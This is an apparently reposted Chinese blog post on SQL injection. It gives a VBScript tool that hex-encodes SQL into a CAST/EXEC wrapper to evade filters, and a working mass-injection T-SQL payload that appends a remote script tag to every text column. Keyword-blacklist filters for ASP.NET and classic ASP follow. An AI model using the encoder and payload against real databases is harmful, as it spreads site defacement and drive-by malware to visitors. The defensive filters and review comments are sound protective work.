SQL注入之SQL语句转十六进制

HTML代码(浏览器端工具:把一条 SQL 语句编码成十六进制并包装成 DECLARE/CAST/EXEC 形式)

<script language=vbs>
' Reads the statement typed into form1.text1, hex-encodes it with Str2Hex and writes the
' DECLARE/CAST/EXEC wrapper into the document. The wrapper exists to hide SQL keywords from
' naive string filters (the ASP.NET blacklist further down still trips on "declare"/"cast(").
sub sqlencode()
 Dim encoded
 encoded = Str2Hex(form1.text1.value)
 document.write "<pre>DECLARE @S NVARCHAR(4000) SET @S=CAST(0x" & encoded & " AS NVARCHAR(4000)) EXEC(@S)</pre>"
end sub
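' Encodes a string as the hex of its UTF-16LE bytes, which is what CAST(0x... AS NVARCHAR) decodes.
' Fixes two defects of the original: characters below 0x10 produced a single hex digit (shifting
' every byte that followed) and Asc() returned DBCS/negative codes for non-ASCII characters, so only
' printable ASCII round-tripped. Returns "" for an empty string.
Function Str2Hex(ByVal strHex)
 Dim sHex, i, code, word
 sHex = ""
 For i = 1 To Len(strHex)
  code = AscW(Mid(strHex, i, 1))
  If code < 0 Then code = code + 65536   ' AscW is signed 16-bit; map code points >= &H8000 back to 0..65535
  word = Right("000" & Hex(code), 4)     ' always four hex digits, e.g. "0041" for "A"
  ' little-endian: low byte first, then high byte
  sHex = sHex & Right(word, 2) & Left(word, 2)
 Next
 Str2Hex = sHex
End Function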
</script>
<form name=form1 method="post">
<p>请输入sql语句,例子:</p><br>
<input type=text name=text1 value='exec master.dbo.xp_cmdshell "net user"--' size=100><input type=submit onclick=sqlencode()
value="给我转">
</form>

 

exp(利用示例:批量挂马语句及其十六进制编码形式)

原程序代码

-- Mass-injection payload: the "original" statement that the encoder above turns into a hex CAST/EXEC wrapper.
-- It opens a cursor over every user table (sysobjects.xtype='u') and every column whose system type id is
-- 99/35/231/167 (ntext/text/nvarchar/varchar, as the description below states) and appends a <script> tag
-- to each stored value, so every page that renders those columns serves the attacker's JavaScript.
-- Running it needs UPDATE on all user tables, which is why an injection point executing as dbo/sa is so
-- damaging; a least-privilege login confines the blast radius.
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name FROM sysobjects a,syscolumns b Where a.id=b.id AND a.xtype='u' AND (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT
FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
-- CONVERT(VARCHAR(4000), ...) truncates anything longer before the tag is appended, so the original data
-- is damaged as well as defaced; text/ntext values past 4000 characters are lost.
EXEC('Update ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://****/*.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

 

转换后的代码

DECLARE @S NVARCHAR(4000) SET @S=CAST(0x<十六进制串,此处省略> AS NVARCHAR(4000)) EXEC(@S)
(十六进制串即上面原语句经 Str2Hex 编码后的结果,原文在此处被截断。)

功能是遍历该数据库的所有数据表中所有varchar、text、nvarchar、ntext类型的字段,并在字段尾加上
<script src=http://****/*.js></script>,常用于js或iframe挂马。把语句转成十六进制再用 CAST(...) EXEC(@S) 执行,目的正是绕过只按关键字(如 update、script)做字符串匹配的过滤;下面 ASP.NET 模块黑名单里的 "declare" 和 "cast(" 恰好能命中这种包装形式,但关键字黑名单本身仍可被注释、编码或未列出的语法绕过,根本防御是参数化查询和最小权限的数据库账号。

 

ASP.NET防SQL注入程序代码

 

using System;
using System.Configuration;
using System.Web;
using System.Globalization;

namespace Koray.SqlInject
{
   /* public class SqlInject
    {

    }
    */
    public class SqlstrAny : IHttpModule
    {
        public void Init(HttpApplication application)
        {
            application.BeginRequest += (new
            EventHandler(this.Application_BeginRequest));
        }
        private void Application_BeginRequest(Object source, EventArgs e)
        {
            ProcessRequest pr = new ProcessRequest();
            pr.StartProcessRequest();
        }
        public void Dispose()
        {
        }
    }

    public class ProcessRequest
    {
        private static string SqlStr = System.Configuration.ConfigurationManager.AppSettings["SqlInject"].ToString();
        private static string sqlErrorPage = System.Configuration.ConfigurationSettings.AppSettings["SQLInjectErrPage"].ToString();
        ///
        /// 用来识别是否是流的方式传输
        ///
        ///
        ///
        bool IsUploadRequest(HttpRequest request)
        {
            return StringStartsWithAnotherIgnoreCase(request.ContentType, "multipart/form-data");
        }
        ///
        /// 比较内容类型
        ///
        ///
        ///
        ///
        private static bool StringStartsWithAnotherIgnoreCase(string s1, string s2)
        {
            return (string.Compare(s1, 0, s2, 0, s2.Length, true, CultureInfo.InvariantCulture) == 0);
        }

        //SQL注入式攻击代码分析
        #region SQL注入式攻击代码分析
        ///
        /// 处理用户提交的请求
        ///
        public void StartProcessRequest()
        {
            HttpRequest Request = System.Web.HttpContext.Current.Request;
            HttpResponse Response = System.Web.HttpContext.Current.Response;
            try
            {
                string getkeys = "";
                if (IsUploadRequest(Request)) return; //如果是流传递就退出
                //字符串参数
                if (Request.QueryString != null)
                {
                    for (int i = 0; i < Request.QueryString.Count; i++)
                    {
                        getkeys = Request.QueryString.Keys[i];
                        if (!ProcessSqlStr(Request.QueryString[getkeys]))
                        {
                            logSqlstr(DateTime.Now.ToShortDateString() +" "+DateTime.Now.ToShortTimeString()+ ":" + Request.ServerVariables["Url"]);
                            logSqlstr(getkeys + "=" + Request.QueryString[getkeys]);
                            Response.Redirect(sqlErrorPage + "?errmsg=QueryStringError&sqlprocess=true");
                            Response.End();
                        }
                    }
                }
                //form参数
                if (Request.Form != null)
                {
                    for (int i = 0; i < Request.Form.Count; i++)
                    {
                        getkeys = Request.Form.Keys[i];
                        if (!ProcessSqlStr(Request.Form[getkeys]))
                        {
                            logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
                            logSqlstr(getkeys + "=" + Request.Form[getkeys]);
                            Response.Redirect(sqlErrorPage + "?errmsg=FormError&sqlprocess=true");
                            Response.End();
                        }
                    }
                }
                //cookie参数
                if (Request.Cookies != null)
                {
                    for (int i = 0; i < Request.Cookies.Count; i++)
                    {
                        getkeys = Request.Cookies.Keys[i];
                        if (!ProcessSqlStr(Request.Cookies[getkeys].Value))
                        {
                            logSqlstr(DateTime.Now.ToShortDateString() + " " + DateTime.Now.ToShortTimeString() + ":" + Request.ServerVariables["Url"]);
                            logSqlstr(getkeys + "=" + Request.Cookies[getkeys]);
                            Response.Redirect(sqlErrorPage + "?errmsg=CookieError&sqlprocess=true");
                            Response.End();
                        }
                    }
                }
            }
            catch(Exception ex)
            {
                // 错误处理: 处理用户提交信息!
                Response.Clear();
                Response.Write("CustomErrorPage Error"+ex.Message);
                Response.End();
            }
        }

        ///
        /// 分析用户请求是否正常
        ///
        /// 传入用户提交数据
        /// 返回是否含有SQL注入式攻击代码
        private bool ProcessSqlStr(string Str)
        {
            bool ReturnValue = true;
            try
            {
                if (Str != "")
                {
                    Str = Str.ToLower();
                    string[] anySqlStr = SqlStr.Split('|');
                    foreach (string ss in anySqlStr)
                    {
                        if (Str.IndexOf(ss) >= 0)
                        {
                            ReturnValue = false;
                            break;
                        }
                    }
                }
            }
            catch
            {
                ReturnValue = false;
            }
            return ReturnValue;
        }

        private void logSqlstr(string str)
        {
            HttpRequest req = System.Web.HttpContext.Current.Request;
            string fileName = "/Log/log_"+DateTime.Now.ToShortDateString().Replace("/","_")+".log";
            fileName=req.MapPath(fileName);
            if (!System.IO.File.Exists(fileName))
            {
                System.IO.FileStream f = System.IO.File.Create(fileName);
                f.Close();
            }
            System.IO.StreamWriter f2 = new System.IO.StreamWriter(fileName, true, System.Text.Encoding.GetEncoding("utf-8"));
            f2.WriteLine(str);
            f2.Close();
            f2.Dispose();

        }
        #endregion
    }
}

在web.config中加入

 

<appSettings>
    <!-- '|'-separated substrings the module rejects. Matching is a plain substring test, so these also block
         legitimate input such as "midnight" (mid), "executive" (exec) or any comment field containing "update".
         With the module as written a trailing '|' yields an empty pattern, and IndexOf("") is 0 for every
         string, so every non-empty parameter would be rejected; do not leave one. appSettings lookups are
         case-insensitive, which is why this "SQLInject" key satisfies the code's "SqlInject". -->
    <add value="exec|insert|delete|update|chr|mid|master|truncate|declare|cast(|drop table" key="SQLInject" />
    <!-- Redirect target for rejected requests; the module appends ?errmsg=...&sqlprocess=true to it. -->
    <add value="/error.aspx" key="SQLInjectErrPage" />
  </appSettings>

<!-- Module registration for the classic pipeline (system.web/httpModules). NOTE(review): under IIS 7+ in
     integrated mode the equivalent entry goes in system.webServer/modules instead; confirm for your server.
     The part after the comma ("Koray.SqlInject") is the assembly name that must be deployed to /bin. -->
<httpModules>
        <add name="SqlstrAny"  type="Koray.SqlInject.SqlstrAny,Koray.SqlInject"/>
  </httpModules>

 ASP.NET组件参考了:
http://hi.baidu.com/honfei/blog/item/7d6bd23610cd0edaa3cc2ba8.html

 

ASP防SQL注入代码

 

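' Blacklist filter for classic ASP: inspects the request URL plus the raw query string and, on a hit,
' appends one line to /Log/err_<date>.log and answers with a warning page (DateToStr and getIP are
' helpers defined elsewhere on the site).
' NOTE(review): only the URL and query string are checked; form fields, cookies and headers pass
' untouched. The substring list is both bypassable (encodings, comments, keywords not listed) and prone
' to false positives (":" rejects any value containing a colon, "select" matches "selected").
' Parameterized queries and a least-privilege DB account are the real defense; keep this for logging.
Sub SQLInject
    Dim strTemp, ErrLogFileName, patterns, p, hit, fso, logFile, ipText
    ErrLogFileName = "/Log/err_" & DateToStr(Now(), "Y-m-d") & ".log"
    strTemp = Request.ServerVariables("URL")
    If Trim(Request.QueryString) <> "" Then strTemp = strTemp & "?" & Trim(Request.QueryString)
    strTemp = LCase(strTemp)
    ' Same fragments as the original Instr() chain, iterated instead of Or'ed together.
    patterns = Array("declare", "select", "insert into", "delete from", "count(", "drop table", "truncate", _
                     "mid(", "char(", "xp_cmdshell", "exec master", "net localgroup administrators", ":", _
                     "net user", "'")
    hit = False
    For Each p In patterns
        If InStr(strTemp, p) > 0 Then
            hit = True
            Exit For
        End If
    Next
    If Not hit Then Exit Sub

    ' Append a single line; CR/LF are stripped so a crafted query string cannot forge extra entries.
    ' The original read the whole log as utf-8, concatenated and rewrote it as gb2312 on every hit,
    ' which costs O(log size) per event and corrupts any non-ASCII text already in the file.
    Set fso = Server.CreateObject("Scripting.FileSystemObject")
    Set logFile = fso.OpenTextFile(Server.MapPath(ErrLogFileName), 8, True)   ' 8 = ForAppending, create if missing
    logFile.WriteLine "IP:" & getIP() & " Time:" & CStr(Now()) & " Info:" & Replace(Replace(strTemp, vbCr, " "), vbLf, " ")
    logFile.Close
    Set logFile = Nothing
    Set fso = Nothing

    ' HTML-encode the address before echoing it: if getIP() honours X-Forwarded-For or similar headers the
    ' value is attacker-controlled, and the original wrote it raw into the page (reflected XSS).
    ipText = Server.HTMLEncode(getIP())
    Response.Write "<html><title>Waring</title><body bgcolor=""EEEEEE"" leftmargin=""60"" topmargin=""30""><font style=""font-size:16px;font-weight:bolder;color:blue;""><li>You has been submit a bad querystring!</li></font><font style=""font-size:14px;font-weight:bolder;color:red;""><br><li>Your Ip Has been record!</li><br><li>IP:" & ipText & "</li><br><li>Time:" & Now & "</li></font></body></html><!--AddTime:" & Now & "-->"
    Response.End
End Sub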

'读日志文件
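' Reads a whole text file (decoded as utf-8) through ADODB.Stream.
' Returns Array(0, contents) on success or Array(Err.Number, Err.Description) when the file cannot be
' loaded or read; callers test element 0 for zero. Error handling now covers the whole function and the
' stream is closed on every path: the original only checked LoadFromFile, left the stream open on
' failure and never checked ReadText.
' NOTE(review): the companion SaveToFileByGb2312 writes gb2312, so a file produced by it and read here
' is decoded with the wrong charset; use one encoding for the log.
Function LoadFromFile(ByVal File)
    Dim objStream, result
    On Error Resume Next
    result = Array(0, "")
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Type = 2            ' adTypeText
    objStream.Mode = 3            ' adModeReadWrite
    objStream.Charset = "utf-8"
    objStream.Open
    objStream.LoadFromFile Server.MapPath(File)
    If Err.Number = 0 Then result = Array(0, objStream.ReadText)
    If Err.Number <> 0 Then
        result = Array(Err.Number, Err.Description)
        Err.Clear
    End If
    If objStream.State <> 0 Then objStream.Close   ' adStateClosed = 0
    Err.Clear
    Set objStream = Nothing
    LoadFromFile = result
End Function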

'写日志
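' Writes strBody to File (path relative to the site root) as gb2312, overwriting any existing file.
' Returns Array(0, "保存文件成功!") on success. The original returned that unconditionally, so a failed
' write (missing /Log directory, no write permission) was reported as success; it now returns
' Array(Err.Number, Err.Description) instead, and the stream is closed on every path.
Function SaveToFileByGb2312(ByVal strBody, ByVal File)
    Dim objStream, result
    On Error Resume Next
    Set objStream = Server.CreateObject("ADODB.Stream")
    objStream.Type = 2               ' adTypeText
    objStream.Charset = "gb2312"
    objStream.Open
    objStream.WriteText strBody
    objStream.SaveToFile Server.MapPath(File), 2   ' adSaveCreateOverWrite
    If Err.Number = 0 Then
        result = Array(0, "保存文件成功!")
    Else
        result = Array(Err.Number, Err.Description)
        Err.Clear
    End If
    If objStream.State <> 0 Then objStream.Close   ' adStateClosed = 0
    Err.Clear
    Set objStream = Nothing
    SaveToFileByGb2312 = result
End Function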

 

原文地址:http://www.nbman.cn/article.asp?id=112
